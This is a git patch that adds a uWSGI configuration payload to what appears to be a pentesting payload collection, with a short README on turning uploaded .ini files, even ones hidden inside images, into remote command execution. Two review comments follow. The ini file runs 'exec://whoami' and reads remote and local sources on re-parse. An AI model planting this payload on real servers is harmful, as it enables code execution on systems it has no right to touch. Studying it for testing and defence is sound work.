From 5f8b3f8a142d6620c40059fe345c396c31d6347e Mon Sep 17 00:00:00 2001 From: Maxence Schmitt Date: Wed, 1 Mar 2023 14:49:31 +0100 Subject: [PATCH] add uwsgi configuration file to Upload Insecure File --- .../Configuration uwsgi.ini/README.md | 32 +++++++++++++++++++ .../Configuration uwsgi.ini/uwsgi.ini | 13 ++++++++ Upload Insecure Files/README.md | 3 ++ 3 files changed, 48 insertions(+) create mode 100644 Upload Insecure Files/Configuration uwsgi.ini/README.md create mode 100644 Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini diff --git a/Upload Insecure Files/Configuration uwsgi.ini/README.md b/Upload Insecure Files/Configuration uwsgi.ini/README.md new file mode 100644 index 0000000000..0407a88a78 --- /dev/null +++ b/Upload Insecure Files/Configuration uwsgi.ini/README.md 
@@ -0,0 +1,32 @@ +# uWSGI configuration file + +uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed: + +Example of malicious uwsgi.ini file: + +```ini +[uwsgi] +; read from a symbol +foo = @(sym://uwsgi_funny_function) +; read from binary appended data +bar = @(data://[REDACTED]) +; read from http +test = @(http://[REDACTED]) +; read from a file descriptor +content = @(fd://[REDACTED]) +; read from a process stdout +body = @(exec://whoami) +; call a function returning a char * +characters = @(call://uwsgi_func) +``` + +When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed. + +## uWSGI lax parsing + +The uWSGI parsing of configuration file is lax. The previous payload can be embedded inside a binary file(e.g. image, pdf, ...). + +## Thanks to + +* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) + diff --git a/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini b/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini new file mode 100644 index 0000000000..7301b4c762 --- /dev/null +++ b/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini 
@@ -0,0 +1,13 @@ +[uwsgi] +; read from a symbol +foo = @(sym://uwsgi_funny_function) +; read from binary appended data +bar = @(data://[REDACTED]) +; read from http +test = @(http://[REDACTED]) +; read from a file descriptor +content = @(fd://[REDACTED]) +; read from a process stdout +body = @(exec://whoami) +; call a function returning a char * +characters = @(call://uwsgi_func) \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 15083b8abd..4813fb096f 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -136,12 +136,14 @@ exiftool -Comment="
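Review bot: in the README hunk (`Configuration uwsgi.ini/README.md`), the text never states the precondition that makes this an upload vector, namely that the uploaded file has to land at a path uWSGI actually reads as its configuration and then be re-parsed; the "restart, crash or autoreload" sentence hints at it without saying which file, and no hardening is mentioned (keep uWSGI configuration outside any upload-writable directory, avoid autoreload in production, and treat unexpected config re-parses as a detection signal). The two explanatory sentences also need wording fixes: "When the configuration file is parsed (e.g. on restart, crash or autoreload), the payload is executed." and "uWSGI's parsing of the configuration file is lax: the previous payload can be embedded inside a binary file (e.g. image, PDF, ...)." Finally, `[REDACTED]` in the ini block reads as censored output rather than as a placeholder; a `<url>` / `<fd>` style placeholder would be clearer.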
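Review bot: the `uwsgi.ini` hunk ends with "\ No newline at end of file"; add the trailing newline. The file is also a verbatim copy of the ini block in the new README, so the two will drift as soon as one is edited; keep the payload in one place (the `.ini` file) and have the README reference it. The `[REDACTED]` values make the `data://`, `http://` and `fd://` lines unusable as written, which is acceptable for a reference file but should be stated in a `;` comment so readers do not take them for valid URIs.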